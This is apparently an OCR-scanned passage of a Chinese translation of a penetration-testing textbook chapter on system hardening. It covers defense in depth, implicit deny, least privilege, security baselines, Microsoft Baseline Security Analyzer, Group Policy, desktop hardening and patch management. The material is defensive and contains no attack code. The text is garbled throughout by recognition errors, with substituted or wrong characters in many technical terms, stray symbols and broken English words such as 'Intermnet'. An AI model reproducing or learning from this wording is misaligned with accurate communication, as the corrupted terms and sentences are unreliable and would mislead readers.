极 主动 地 处 理 这 些 问 题 同 样 重要 。 我 们 都 知道 ， 在 问题 爆发 之 前 阻止 它 可 以 极 大 地 减少 工 
作 量 。 这 正 是 安全 加 固 流程 的 出 发 点 。 该 流程 是 一 个 持续 改进 的 过 程 ， 因 为 随 厦 威胁 的 变 
人 化， 脆弱 性 也 会 随 之 而 变 ， 意 味 着 组 织 必须 进行 相应 的 调整 。 该 过 程 将 有 多 个 阶段 ， 包 括 
按 需 进行 的 各 种 评估 、 重 新 评估 和 和 补救 工作 。 


本 章 将 学 习 : 
& 理解 为 何 系统 需要 进行 加 固 
人 5 理解 纵深 防御 、 隐 式 碟 绝 和 最 小 权限 的 理念 
人 5 使 用 微软 安全 基线 分 析 工 具 
多 ”加固 桌面 计算 机 
如 备份 系统 


16.1 ”加 固 简 介 


尽管 大 多 数 系 统 、 人 硬件 和 软件 供应 商 在 其 各 目的 产品 中 提供 了 许多 内 置 的 安全 功能 ， 
但 这 些 功能 无 法 提供 全 面 的 保护 。 任 何 系统 上 存在 的 安全 功能 都 只 是 以 一 种 “一 刀 切 ” 
的 方式 限制 访问 ， 而 并 不 考虑 具体 情况 。 作 为 一 名 渗透 测试 者 ， 应 该 认识 到 ， 计 算 机 系统 
仍然 充斥 看 可 以 利用 的 漏洞 。 改 善 这 种 情况 需要 一 个 称 为 系统 加 固 (system hardening) 的 过 
程 ， 该 过 程 则 在 尽 可 能 降低 风险 并 减少 安全 漏洞 。 该 过 程 可 以 由 信息 技术 人 员 ， 甚 至 是 渗 
透 测试 者 (如 条 合同 如 此 签订 ) 进 行 。 

系统 加 固 是 一 套 则 在 通过 消除 安全 风险 ， 尽 可 能 地 增强 系统 安全 性 的 流程 。 该 流程 通 
肖 包 含 定 义 系 统 ( 即 Web 服 务 器 或 果 面 ) 的 任务 角色 ， 然 后 删除 任何 承担 此 角色 所 不 需要 的 
内 容 。 如 果 严 格 执行 此 流程 ， 系 统 将 删除 所 有 非 必 需 软 件 包 ， 并 共用 其 他 功能 ， 以 减少 威 
胁 面 。 这 样 做 能 够 减少 漏洞 的 数量 ， 并 减少 存在 潜在 后 门 的 可 能 性 。 


应 注意 定义 系统 角色 的 步骤 ， 它 对 于 进一步 加 固 系统 是 至 关 重 要 的 。 定 义 角色 至 关 重 
要 的 原因 是 在 确定 必需 项 目 之 前 ， 不 可 能 有 效 地 去 除非 必需 的 服务 。 

如 果 对 此 过 程 的 重视 程度 很 高 ， 则 可 以 采取 更 加 严格 的 措施 ， 其 中 包括 : 
除 硬盘 


@ 重新 安装 操作 系统 前 重新 格式 化 并 的 
@ 将 BIOS 中 的 局 动 顺序 从 移动 存储 设备 改 为 其 他 组 件 

@ 设置 BIOS 密 码 

对 操作 系统 打 补 丁 

对 应 用 程序 打 补 丁 

删除 或 禁用 未 使 用 的 用 户 账户 

设置 强 密码 

删除 非 必 需 的 网 络 协 议 

删除 默认 共享 

禁用 默认 服务 

加 固 中 所 实施 的 步骤 是 一 个 因 事 制 宜 的 目标 ， 其 具体 流程 因 公 司 不 同 而 区 别 很 大 。 这 
就 是 为 何 增强 系统 安全 需要 有 关系 统 工 作 原 理 、 可 用 功能 和 漏洞 的 高 水 平 知识 的 原因 。 

当然 ， 系 统管 理 员 应 该 时 刻 记 住 ， 虽 然 在 任何 给 定 的 网 络 上 都 会 运行 多 种 不 同 的 计算 
系统 和 服务 ， 但 无 论 是 移动 系统 、 笔 记 本 电脑 、 呆 面 计算 机 还 是 服务 器 ， 有 所 有 的 设备 都 有 
操作 系统 ， 在 技术 上 ， 提 高 操作 系统 层面 的 安全 性 ， 是 迈 回 更 安全 环境 的 重要 的 第 一 步 。 
事实 上， 攻击 者 非常 清楚 操作 系统 是 所 有 环境 中 的 共同 特征 ， 因 而 它们 是 一 个 很 好 的 攻击 
起 始点 。 这 也 正 是 为 何 操作 系统 是 很 好 的 防御 起 始点 的 原因 。 

此 外 ， 操 作 系统 非常 复杂 ， 并 且 无 论 系 统 的 创建 者 是 谁 ， 所 有 的 操作 系统 都 受到 各 种 
缺陷 的 影响 ， 其 中 某 些 可 能 导致 安全 问题 。 在 技术 领域 有 一 些 人 认为 ， 某 些 系 统 比 其 他 系 
统 更 安全 ， 并 且 是 “与 生 俱 来 ”的 。 现 实 是 ， 取 决 于 使 用 者 和 设置 方式 ， 任 何 操作 系统 都 
可 能 更 加 安全 ， 或 者 更 不 安全 。 由 于 其 用 户 和 支持 人 员 的 错误 操作 ， 操 作 系 统 经 常会 配置 
错误 甚至 管理 不 当 ， 单 单 是 这 条 原因 就 能 使 它们 成 为 攻击 目标 。 


16.2 ”防御 三 原则 
以 下 是 强化 系统 的 三 种 方法 。 


16.2.1 采取 纵深 防御 的 方法 


纵深 防御 (Defense in depth) 是 信息 安全 中 的 一 个 强大 而 重要 的 理念 ， 该 理念 描述 了 综 
合 使 用 多 种 相辅相成 的 安全 对 抗 措施 ， 保 护 企业 中 的 资产 。 该 策略 是 以 军事 或 “堡垒 战 
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略 ” 原 则 为 基础 ， 因 为 对 敌人 而 言 ， 击 败 一 个 复杂 多 层 的 防御 体系 ， 要 比 克服 单个 障碍 更 
困难 。 想 象 一 个 具有 所 有 防御 措施 的 堡垒 一 一 其 防御 通常 包括 护城河 、 城 墙 、 己 第 手 、 投 
石 机 ， 在 茶 些 时 候 ， 还 有 灼热 的 熔 铅 。 在 攻击 者 突破 一 层 安 全 防御 后 ， 还 必须 与 妨 一 层 进 
行 对 抗 。 

纵深 防御 是 一 种 降低 攻击 最 终 成 功 可 能 性 的 方法 。 对 于 同系 统 发 起 攻击 者 ， 不 同 的 层 
通常 通过 以 下 三 种 方式 之 一 阻止 攻击 (但 并 非 唯一 的 方式 )。 


为 防御 失败 提供 保护 

如 果 只 使 用 一 种 安全 措施 ， 该 措施 失败 导致 的 风险 将 严重 得 多 。 在 这 种 情况 下 ， 如 果 
只 部 署 了 单一 的 安全 手段 ， 并 且 该 手段 (哪怕 只 是 轻微 的 ) 保 护 失 败 ， 将 导致 系统 处 于 完全 
不 设防 状态 。 例 如 ， 如 果 网 络 仅 由 防火 墙 保护 ， 并 且 防 火 墙 发 生 故 障 ， 则 攻击 者 即 可 轻易 
访问 网 络 。 


迟滞 攻击 者 
如 果 使 用 了 多 种 防御 措施 ， 攻 击 者 就 必须 成 功 地 击败 几 种 对 抗 手段 ， 这 样 做 的 目的 之 
一 就 是 为 防守 者 赢得 检测 和 阻止 攻击 的 时 间 。 


作为 威慑 性 防御 

虽然 没有 任何 防御 能 够 阻止 那些 真正 希望 入 侵 系 统 的 人 ， 但 多 层 防 御 机 制 也 能 够 威 慨 
许多 人 人。 事实 是 ， 技 术 娴 熟 的 黑客 要 少 于 脚本 小 子 和 初学 者 。 民 好 的 防御 可 以 作为 令 许多 
人 望而却步 的 强大 障碍 ， 意 味 着 在 许多 情况 下 真正 的 攻击 不 会 发 生 。 

总 而 言 之 ， 永 远 个 要 把 所 有 的 鸡 重 放 在 一 个 篮子 里 。 依 赖 于 单一 的 安全 机 制 是 形成 灾 
难 的 完美 配方 ， 因 为 任何 技术 或 流程 都 可 能 会 失败 。 万 一 所 依赖 的 单一 机 制 发 生 故 障 ， 束 
没有 安全 机 制 保护 组 织 免 受 攻击 。 当 然 ， 防 御 措 施 的 层次 同样 不 得 过 多 一 一 过 多 层次 可 能 
导致 系统 难以 管理 。 


16.2.2 ”贯彻 隐 陈 拒绝 原则 


安全 中 最 重要 的 理念 之 一 是 “ 隐 式 拒绝 (implicit deny)”。 简 而 言 之 ， 隐 式 拒 绝 说 明 如 
果 某 个 行为 未 得 到 明确 的 允许 ， 默 认 情 况 下 将 拒绝 该 行为 。 为 了 安全 起 见 ， 无 论 是 用 户 还 
是 软件 ， 只 有 在 得 到 明确 授予 的 权限 之 后 ， 才 允许 访问 数据 或 资源 ， 执 行 操作 。 正 确 贯彻 
隐 式 拒绝 原则 时 ， 未 经 特别 明确 声明 的 行为 是 不 允许 的 。 

在 许多 场合 都 使 用 了 隐 式 拒绝 原则 ， 包 括 软件 中 的 许多 区 分 安全 和 不 安全 的 环境 的 位 
置 。 隐 式 拒 绝 的 一 个 例子 是 防火 墙 ， 在 其 中 系统 被 锁定 ， 并 且 不 允许 任何 流量 通过 ， 直 到 
系统 所 有 者 配置 系统 ， 人 允许 特定 流量 通过 。 

在 现实 世界 中 ， 并 不 是 所 有 软 硬 件 都 会 遵守 该 原则 。 对 于 许多 现代 操作 系统 ， 趋 势 是 
尽 可 能 地 增强 系统 易 用 性 ， 这 意味 着 默认 情况 下 允许 许多 操作 。 这 种 做 法 可 以 被 认为 是 一 
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种 隐 式 允许 ， 因 为 出 于 安全 原因 ， 不 应 该 允许 其 中 许多 操作 。 这 意味 着 许多 设备 和 软件 需 
要 配置 为 又 不 质疑 地 允许 所 有 操作 。 为 什么 要 这 样 做 ? 简 而 言 之 ， 如 果 操 作 系统 允许 坚 不 
质疑 地 执行 所 有 操作 ， 它 对 于 最 终 用 户 来 说 将 更 加 好 用 ， 换 言 之 ， 使 用 更 方便 一 一 以 牺牲 
安全 为 代价 。 这 一 隐 式 允许 策略 有 何 后 果 ? 许多 用 户 对 系统 进行 安装 、 配 置 或 执行 某 些 他 
们 不 具备 资格 执行 或 是 一 知 半 解 的 操作 ， 最 终 引 发 组 织 内 的 安全 问题 或 事故 。 


16.2.3 ”贯彻 最 小 权限 原则 


健壮 的 安全 程序 的 另 一 个 核心 要 素 是 最 小 权限 (least privilege)。 该 理念 规定 ， 系 统 的 
用 户 执行 任何 任务 时 ， 都 只 能 具有 完成 工作 所 必需 的 最 低 限 度 访问 权限 。 这 一 理念 可 以 适 
用 于 对 设施 、 硬 件 、 数 据 、 软 件 、 人 员 或 任意 数量 要 素 的 访问 。 当 正确 实现 并 执行 该 原则 
时 ， 向 用户 或 系统 授予 访问 权限 ， 该 权限 级 别 同 样 应 只 限于 满足 执行 必要 任务 所 需 。 

在 任何 时 候 ， 任 何 给 定 的 程序 和 系统 的 所 有 用 户 ， 都 应 该 使 用 完成 工作 所 需 的 最 低 限 
度 权 限 集运 作 ， 不 应 过 多 ， 也 不 应 过 少 。 如 果 按 照 上 述 方式 实施 ， 该 原则 能 够 控制 事故 或 
错误 可 能 导致 的 损害 。 它 也 有 助 于 将 特权 程序 之 间 可 能 有 害 的 交互 活动 减少 到 正确 运作 所 
必需 的 最 低 限 度 ， 从 而 大 大 降低 特权 的 无 意 、 非 期 望 或 不 正确 使 用 并 造成 危害 的 可 能 。 如 
果 出 现 与 滥用 特权 相关 的 问题 ， 该 原则 最 大 限度 地 减少 了 必须 审核 的 程序 数量 。 最 少 特 
权 的 另 一 个 例子 是 “知情 范围 meed-to-know)”， 它 采用 军事 和 防务 承包 商 环境 中 的 同类 
设置 。 

在 Windows 10 中 (实际 上 从 Windows Vista 开 始 )， 会 在 许多 敏感 的 系统 操作 界面 劳 边 时 
示 一 个 彩色 的 盾牌 图 标 。 这 个 盾牌 图 标 提醒 警惕 的 用 户 所 选择 的 操作 将 需要 使 用 升级 的 权 
限 ， 因 此 将 提示 用 户 批 准 。 如 果 用 户 未 以 管理 员 身 份 登录 ， 则 必须 提供 凭据 来 证 明 他 们 有 
权 执 行 该 操作 。 如 果 用 户 以 管理 员 吴 份 登录 ， 则 会 询问 他 们 是 否 请 求 了 该 操作 ， 咎 是 ， 是 
否 希望 批准 该 操作 继续 。 

最 小 权限 原则 是 一 种 对 许多 类 型 的 攻击 和 事故 的 有 效 防 御 ， 但 只 有 在 得 到 实施 并 遵守 
的 前 提 下 才 是 如 此 ， 否 则 它 将 失去 效力 。 因 为 实施 和 维护 最 小 权限 原则 可 能 是 耗 时 且 乏 味 
的 ， 系 统管 理 员 可 能 很 容易 滋长 惰性 ， 忽 视 坚持 该 理念 。 考 虑 一 个 人 在 组 织 内 更 换 职 位 或 
工作 时 可 能 出 现 的 问题 ， 逻 辑 上 其 责任 会 发 生变 化 ， 这 意味 着 应 对 其 特权 作 相应 的 更 改 。 

注意 到 “只 有 得 到 实施 和 遵守 ”这 几 个 字 了 吗 ? 这 可 能 是 最 棘手 的 部 分 。 在 许多 公 
司 中 ， 实 施 最 小 权限 原则 只 会 激怒 无 法 再 像 以 前 一 样 为 所 欲 为 的 高 层 。 因 为 这 些 被 激怒 的 
人 在 公司 中 身 处 高 位 ， 他 们 可 以 要 求 /命令 解除 限制 。 即 使 这 些 人 并 不 需要 额外 的 权限 ， 
他 们 还 是 能 得 到 这 些 权 限 。 在 许多 情况 下 最 终结 果 是 降低 安全 性 ， 或 者 更 糟 ， 发 生 安全 
事故 。 

系统 管理 员 需 要 跟踪 必要 的 权限 ， 以 便 某 人 不 会 因 更 换 工 作 疯 位 而 最 终 获得 超出 所 需 
的 权限 ， 从 而 开启 事故 之 门 ， 并 造成 重大 损失 。 
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16.3 建 记 安全 基线 


加 固 系统 的 第 一 步 是 从 安全 性 的 角度 ， 根 据 其 具体 角色 确定 系统 的 各 方面 。 这 正 是 安 
全 基线 发 挥 作用 的 地 方 。 安 全 基线 提供 了 一 个 有 用 的 指标 ， 可 以 根据 系统 的 预期 角色 和 定 
义 角 色 对 其 进行 度量 。 

简 而 言 之 ， 安 全 基线 是 一 个 需要 应 用 于 组 织 内 某 个 特定 系统 的 期 望 配置 设置 的 详细 列 
表 。 在 建立 基线 后 ， 它 将 作为 比较 系统 的 基准 。 不 满足 或 超出 基线 规定 的 需求 的 系统 将 需 
要 采取 使 其 合 规 的 补救 措施 ， 或 需要 从 环境 中 移 除 (除了 公司 安全 策略 允许 的 其 他 行动 以 
外 )。 当 为 任何 给 定 的 系统 生成 基准 时 ， 最 终 得 到 的 设置 将 取决 于 该 系统 中 使 用 的 操作 系 
统 ， 以 及 组 织 内 为 该 系统 分 配 的 角色 。 

基线 并 非 是 一 成 不 变 的 ， 而 是 应 当 与 时 俱 进 。 导 致 基线 改变 的 因素 包括 操作 系统 升 
级 、 角 色 变 化 、 数 据 处 理 需 求 和 新 硬件 。 

创建 用 于 度量 茶 个 给 定 系统 的 基线 的 第 一 步 是 定义 系统 角色 。 表 面 上 似乎 有 可 能 只 需 
要 一 到 两 个 基线 一 王 人 们 会 下 意识 地 认为 和 面 系统 只 需要 一 个 ， 另 一 个 则 用 于 服务 器 
但 通常 需要 更 多 的 基准 。 应 通过 检查 环境 中 的 计算 和 数据 处 理 系 统 识别 角色 ， 并 确定 哪些 
色 具 有 共性 要 求 。 这 些 共性 要 求 将 共同 定义 一 个 角色 ， 可 对 该 角色 应 用 一 组 通用 的 配置 
选项 。 

例如 ， 基 线 应 包括 部 署 到 工作 站 的 最 基础 软件 、 基 本 网 络 配 置 和 访问 权 以 及 最 新 安装 
的 服务 包 (Service Pack)。 

尽管 确实 在 许多 组 织 中 ， 一 套 共同 的 设置 可 以 适用 于 所 有 系统 ， 但 仍然 会 有 可 识别 的 
具有 自 呈 独特 要 求 的 群体 。 通 常 ， 组 织 将 定义 那些 对 于 所 有 系统 中 通用 的 设置 ， 然 后 根据 
需要 ， 通 过 添加 其 他 设置 和 配置 选项 ， 进 行进 一 步 的 定制 增强 。 

即使 在 最 好 的 情况 下 ， 创 建安 全 基准 也 是 一 项 艰巨 的 任务 ， 但 是 也 有 许多 可 以 简化 其 
过 程 、 提 高 效率 的 工具 。 此 外 ， 操 作 系 统 的 制造 商 通 常 也 会 发 布 可 用 于 进一步 微调 系统 的 
指南 。 使 用 软件 工具 ， 可 以 通过 将 过 程 自动 化 ， 更 简便 、 更 快速 地 扫描 和 检测 范围 广泛 的 
潜在 问题 。 一 些 常用 的 加 固 系 统 和 创建 基线 的 工具 有 : 

Bastille 这 种 基于 Linux/Unix 的 工具 用 于 扫描 和 加 固 系统 ， 以 增强 其 安全 型 。 应 当 指 
出 的 是 ， 该 工具 已 有 一 段 时 间 没 有 更 新 ， 不 过 在 某 些 情况 下 它 仍然 可 以 用 作 加 固 工 具 。 

微软 基线 安全 分 析 工 具 (Microsoft Baseline Security Analyzer，MBSA) 此 工具 已 由 
微软 推出 了 很 长 时 间 ， 并 在 这 些 年 中 得 到 了 改进 。 该 工具 设计 用 于 对 系统 进行 扫描 ， 并 将 
其 与 一 个 常见 的 不 当 设 置 以 及 其 他 问题 的 列表 进行 比较 。 

安全 配置 向 导 (Security Configuration Wizard ，SCW) 最 初 在 Windows Server 2003 
中 引入 的 SCW 现 已 成 为 一 种 改善 系统 安全 性 的 有 用 工具 。 该 同 导 将 引导 完成 创建 、 编 
辑 、 应 用 或 回 深 由 系统 所 有 者 定制 的 安全 策略 的 过 程 。 

微软 基线 安全 分 析 工 具 (MBSA) 可 能 是 最 著名 的 工具 。 当 这 个 工具 最 初 于 2004 年 发 布 
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时 ， 很 快 作为 一 种 通过 确定 系统 中 缺少 哪些 内 容 和 哪些 配置 选项 影响 安全 性 ， 人 快速 而 粗略 
地 评估 系统 安全 性 的 方式 ， 被 许多 IT 和 安全 领域 人 士 采 用 。 该 工具 能 够 对 Windows、SQL 
Server 和 Office 进 行 相当 基本 但 很 彻底 的 评估 。 在 评估 过 程 中 ， 该 工具 还 将 扫描 其 宿主 系 
统 ， 以 确定 系统 中 缺少 哪些 补丁 ， 并 通知 用 户 应 采取 何 种 措施 来 纠正 该 问题 。 

与 市 场 上 的 许多 其 他 工具 相反 ，MBSA 除 了 几 个 基本 选项 之 外 ， 没 有 提供 任何 定制 扫 
描 能 力 。 基 本 上 ， 该 工具 可 以 使 用 预定 义 的 设置 组 扫 朱 系统， 这 些 设 置 组 是 微软 认定 为 对 
系统 安全 性 影响 最 大 的 相关 设置 。 

MBSA 包 括 对 下 列 操作 系统 和 应 用 程序 的 支持 : 

@ Windows， 从 Windows 2000 到 Windows 10， 及 其 服务 器 版 本 ， 从 Windows 2000 到 

Windows Server 2012 

@ Internet 信 息 服务 器 (IIS)， 版 本 5 到 8 

® Office 2000 到 Ofce2016 

@ Internet Explorer 5 及 更 高 版 本 

此 外 ，MBSA 同 时 支持 32 位 和 64 位 平台 ， 可 在 两 个 平台 上 执行 准确 的 安全 评估 ， 且 具 
备 上 下 文 相关 帮助 功能 。MBSA 是 一 个 有 用 的 工具 ， 但 应 注意 避免 过 度 依赖 其 输出 。 虽 然 
该 工具 为 执行 评估 提供 了 恨 好 基础 ， 并 可 保存 结果 以 供 后 续 比 较 ， 但 并 非 一 个 一 揽 子 的 最 
终 解决 方案 。MBSA 仪 适用 于 Windows 平 台 。 此 外 ， 该 工具 只 能 够 评估 固定 的 应 用 程序 组 
合 ， 因 此 不 会 评估 任何 未 在 其 中 硬 编码 进行 检查 的 应 用 程序 。 


执行 审核 


尽管 可 能 会 看 到 术语 渗透 测试 与 安全 审核 互 换 使 用 ， 但 它们 并 不 是 一 回 事 。 渗 透 测 试 
者 可 能 对 未 个 网 络 资源 上 的 茶 项 服务 开展 分 析 。 他 们 通 弟 在 防火 场 之 外 工作 ， 所 知 的 内 网 
信息 很 少 ， 以 便 更 真实 地 模拟 黑客 攻击 目标 的 手段 。 

审核 则 是 对 组 织 的 安全 策略 在 特定 点 上 部 着 和 运行 状况 的 评估 。 计 算 机 安全 审核 人 员 
公开 开展 工作 ， 具 备 对 组 织 的 全 面 知 识 ， 并 且 往 往 掌 握 相当 量 的 用 于 帮助 其 了 解 得 审计 的 
资源 的 内 部 信息 。 安 全 审核 员 通过 个 人 访谈 、 漏 洞 扫 描 、 操 作 系 统 设 置 检 查 ， 分 析 网 络 共 
享 和 有 历史 数据 ， 完 成 其 工作 。 


16.4 ”使 用 组 案 略 进行 加 固 


使 用 工具 分 析 和 配置 计算 机 系统 的 基本 设置 只 是 “锁定 ”计算 机 的 第 一 步 ， 因 为 还 有 
更 多 工具 可 用 于 提供 安全 性 。Windows 系 列 操作 系统 中 的 组 策略 是 其 中 最 流行 的 工具 之 一 。 
在 其 最 简单 的 形式 中 ， 组 策略 只 不 过 是 一 种 用 于 一 次 配置 多 个 系统 的 集中 式 机 制 。 在 
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一 位 有 正确 的 规划 和 评估 指导 的 熟练 管理 员 手 中 ， 该 技术 可 用 于 配置 系统 中 的 几乎 每 个 先 
项 ， 包 括 : 
@ 用 户 是 否 可 以 安装 设备 
用 户 是 否 可 以 安装 软件 
用 户 可 以 连接 哪些 打印 机 
用 户 可 以 更 改 何 种 设置 
可 从 何 处 下 载 修补 程序 
审核 如 何 配置 
注册 表 操 作 权 限 
受 限 的 用 户 组 
文件 系统 操作 权限 
Windows Active Directory 中 的 组 策略 有 超过 1000 个 设置 项 目 ， 但 这 并 不 意味 着 需要 配 
置 每 项 设置 一 一 实际 上 ， 没 有 管理 员 应 该 尝试 这 样 做 。 应 当 只 配置 那些 达到 公司 策略 所 规 
定 的 特定 安全 级 别 所 需 的 设置 。 


16.5 呆 面 系统 安全 加 固 


对 攻击 者 而 言 ， 轩 面 级 家 性 和 了 商用 计算 机 系统 是 一 个 流行 而 且 诱 人 的 目标 。 即 使 是 初 
学 攻击 者 也 知道 ， 一 般 的 计算 机 用 户 都 会 在 其 中 存储 丰富 的 信息 和 其 他 内 容 。 考 虑 这 样 的 
事实 ， 一 般 家 庭 用 户 会 年 复 一 年 地 在 硬盘 上 存储 大 量 信息 ， 并 且 经 常 将 其 迁移 到 新 系统 ， 
信息 量 会 像 滚 雪 球 一 样 迅速 增加 。 普 通用 户 会 在 计算 机 中 存储 包括 银行 信息 、 信 用 卡 信 
息 、 照 片 、 聊 天 日 志和 许多 其 他 项 目的 一 切 。 如 果 获 得 了 足够 的 信息 ， 用 户 即 可 轻易 窃取 
身份 ， 并 使 用 守 得 的 名 字 和 信用 信息 来 购买 自己 想 要 的 物品 。 如 果 这 是 一 台 商 用 电脑 ， 那 
么 其 代价 有 所 不 同 ， 如 果 不 是 更 高 的 话 : 公司 信息 在 用 户 的 硬盘 上 就 像 任 凭 攻击 者 末 技 的 
成 熟 果实 。 

入 侵 者 希望 获得 计算 机 的 资源 ， 如 硬盘 空间 、 人 快速 的 处 理 器 和 Interet 连 接 。 他 们 可 以 
利用 这 些 资源 来 攻击 Intermnet 上 的 其 他 目标 。 事 实 上， 入 侵 者 使 用 的 计算 机 越 多 ， 执 法 机 构 
越 难 找 出 攻击 最 终 来 自 哪里 。 如 果 找 不 到 入 侵 者 ， 就 无 法 阻止 ， 也 不 能 起 诉 他 们 。 

为 什么 入 侵 者 会 脑 准 和 更 面 系统 ?通常 是 因为 它们 是 薄弱 环节 : 家 用 计算 机 一 般 不 是 很 
安全 ， 很 容易 入 侵 。 男 一 方面 ， 公 司 计算 机 可 能 情况 有 所 不 同 ， 但 是 这 些 系 统 通常 是 较 易 
攻破 的 “ 软 ” 目 标 ， 并 可 能 提供 一 个 通 往 公 司 内 更 具 价值 资产 的 跳板 。 当 与 一 个 始终 在 线 
的 高 速 Internet 连 接 相 结合 时 ， 入 侵 者 可 以 快速 找到 并 攻击 家 用 计算 机 。 虽 然 入 侵 者 也 会 通 
过 拨号 连接 攻击 连接 到 Internet 的 计算 机 ， 但 高 速 连接 是 最 受 欢 迎 的 目标 。 


对 浴 秀 测试 入 门 详 战 


入 侵 者 如 何 侵入 一 台 计 算 机 ? 在 茶 些 情况 下 ， 他 们 会 发 送 这 有 病毒 的 电子 邮件 。 阅 
读 该 电子 邮件 将 激活 病毒 ， 创 建 入 侵 者 进入 或 访问 计算 机 的 通道 。 在 其 他 情况 下 ， 他 们 利 
用 杀 个 计算 机 程序 的 缺陷 或 弱点 ， 获 取 访 问 权 限 。 

在 攻击 者 入 侵 计算 机 后 ， 他 们 通常 会 安装 新 的 程序 ， 以 让 他 们 得 以 在 系统 所 有 者 坪 
塞 了 他 们 最 初 用 以 入 侵 那 些 漏洞 之 后 继续 使 用 该 计算 机 。 这 些 后 门 程序 通常 经 过 巧妙 的 伪 
装 ， 以 将 目 身 混同 于 在 计算 机 上 运行 的 其 他 程序 。 


16.5.1 管理 补丁 


处 理 系统 漏洞 的 方法 之 一 是 对 系统 打 补 丁 和 应 用 更 新 。 这 是 你 应 该 准备 加 客户 建议 
的 内 容 。 就 在 几 年 前 ， 最 为 流行 的 明智 做 法 还 是 从 头 开 始 构建 一 个 系统 ， 并 在 初始 安装 时 
安装 所 有 应 用 程序 ， 以 及 更 新 和 修补 程序 ， 然 后 进行 部 署 ， 并 且 不 经 第 或 从 不 安装 其 他 更 
新 。 目 2000 年 以 来 ， 这 种 做 法 发 生 了 很 大 的 变化 ， 因 为 许多 组 织 成 为 恶意 软件 和 其 他 类 型 
的 恶作剧 的 受害 者 ， 人 们 考虑 并 实施 了 对 该 普遍 做 法 的 重新 评估 。 通 过 定期 应 用 补丁 本 可 
防止 的 停机 和 产 出 损失 是 这 一 转变 的 重要 原因 。 随 厦 威 胁 的 增加 ， 人 们 更 加 关注 对 于 治理 
和 监管 的 合 规 性 (例如 HIPAA、 了 蔷 班 斯 一 奥克斯 利 法 案 、FISMA)， 以 更 好 地 控制 和 监督 信 
恩 。 考 虑 到 正在 崛起 的 互联 程度 与 日 俱 增 的 合作 伙伴 和 客户 ， 以 及 速度 更 高 的 网 络 连接 ， 
对 于 更 好 的 补丁 和 维护 方法 的 需求 变 得 愈加 强烈 。 

很 容易 看 出 ， 为 什么 随 着 时 间 的 推移 ， 适 宜 的 补丁 管理 已 经 不 仅仅 成 为 一 个 重要 问 
题 ， 而 且 还 成 为 一 个 关键 问题 。 

补丁 管理 程序 的 目标 是 设计 和 部 署 一 个 得 到 一 致 的 配置 ， 修 补 了 已 知 漏洞 形式 的 安全 
问题 的 环境 。 管 理 一 个 小 组 织 中 存在 的 所 有 软件 的 更 新 是 相当 复杂 的 ， 而 当 纳 入 额外 的 平 
台 、 可 用 性 要 求 、 远 程 办 公 室 和 工作 人 员 时 ， 管 理 将 更 为 复杂 。 

因此 ， 由 于 每 个 环境 都 具有 其 独特 的 技术 需求 ，( 不 同 的 ) 成 功 的 补丁 管理 程序 将 在 设 
计 和 实现 上 有 很 大 的 差异 。 但 是 ， 有 一 些 在 所 有 补丁 管理 工作 中 都 应 当 纳 入 并 解决 的 
问题 。 


1. 研究 信息 源 


补丁 管理 的 一 个 关键 组 成 部 分 是 信息 的 研究 和 验证 。 每 个 组 织 均 应 指定 一 个 人 或 团队 
负责 跟踪 应 用 程序 和 操作 系统 的 更 新 与 安全 问题 。 该 团队 应 当 在 向 管理 员 提醒 (后 者 所 负 
责 支持 的 ) 应 用 程序 和 系统 的 安全 问题 或 更 新 方面 发 挥 作用 。 一 个 全 面 准确 的 资产 管理 系 
统 可 以 帮助 判定 在 研究 和 处 理 补丁 和 更 新 信息 时 是 否 纳入 了 全 部 现 有 系统 。 


2. 制订 补丁 更 新 计划 和 优先 级 排序 


在 开发 补丁 管理 流程 时 ， 应 当 考 虑 几 个 因素 ， 以 尽 可 能 地 获得 最 为 高 效 优化 的 流程 。 
开发 补丁 管理 流程 时 投入 的 研究 和 时 间 越 多 ， 就 越 有 可 能 更 加 有 效 地 阻止 或 至 少 削弱 各 种 
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安全 威 肋 和 漏洞 的 影 啊 一 一 甚 全 在 它们 成 为 问题 之 前 。 

应 考虑 的 第 一 个 因素 是 补丁 管理 流程 需要 指导 和 规范 在 任何 给 定 环境 中 对 系统 的 补丁 
和 更 新 的 管理 和 应 用 。 通 和 对 于 最 基本 的 级 别 ， 需 要 有 一 个 补丁 管理 过 程 ， 该 过 程 只 涉及 
应 用 补丁 和 更 新 可 用 时 应 用 这 一 和 常规 任务 ， 以 确保 定期 维护 完成 且 不 被 忽视 。 绝 对 不 应 出 
现 的 一 种 情况 是 ， 仅 为 了 啊 应 某 个 问题 或 威胁 才 应 用 补丁 或 更 新 程序 。 总 而 言 之， 应 当 尽 
量 避 人 免 末 取 被 动 啊 应 的 流程 ， 而 应 将 先发制人 作为 立足 点 。 作 为 正常 维护 的 一 部 分 ， 间 隔 
多 人 久 时 间 执 行 一 次 补丁 应 用 流程 是 每 个 组 织 目 己 考虑 的 事情 。 例 如 ， 一 些 组 织 可 能 会 决定 
每 月 应 用 一 次 补丁 ， 因 此 可 能 会 决定 将 重大 补丁 延迟 到 每 个 季度 进行 。 他 们 也 可 能 决定 采 
用 相反 的 做 法 ， 每 两 周 内 应 用 一 次 补丁 ， 作 为 正 弟 维护 工作 的 一 部 分 。 读 到 此 处 你 可 能 认 
为 三 个 月 (每 季度 ) 的 等 竺 补丁 时 间 过 长 ， 但 此 处 并 没有 一 个 放 之 四 海 而 丝 准 的 解决 方案 。 
还 应 谨 记 的 是 ， 在 此 讨论 的 补丁 并 非 专 为 解决 安全 问题 而 应 用 ， 虽 然 它 们 可 能 用 于 解决 东 
个 问题 ， 但 并 非 是 一 个 关键 问题 。 对 于 关键 问题 ， 应 当 准 备 好 问题 出 现时 特殊 情况 特殊 处 
理 的 预案 。 

对 于 以 补丁 、 服 务 包 甚至 热 修 补 程 序 hotfix) 形 式 的 关键 更 新 ， 需 要 制订 一 个 计划 满足 
这 些 特 定 软件 项 目的 需求 。 除 了 定期 维护 以 外 ， 可 以 预期 不 时 会 出 现 高 度 优 先 或 备 受 关注 
的 安全 问题 。 安 全 研究 人 员 或 供应 商 找到 并 识别 这 些 问 题 ， 并 确定 它们 确实 是 必须 尽快 解 
决 的 关键 问题 。 为 应 对 此 类 情况 的 发 生 ， 组 织 需 要 准备 好 一 套用 于 处 理 这 些 不 能 等 待 正 第 
维护 周期 的 计划 外 情况 的 流程 。 在 此 关 情 况 中 ， 补 丁 必 须 立 即 部 普 并 安装 在 系统 中 ， 以 避 
免 安 全 问题 的 失控 或 引发 更 严重 的 问题 。 

通 第 而 言 ， 局 动 这 一 补丁 流程 的 条 件 是 ， 供 应 商 将 茶 个 问题 识别 为 对 其 客户 的 稳定 和 
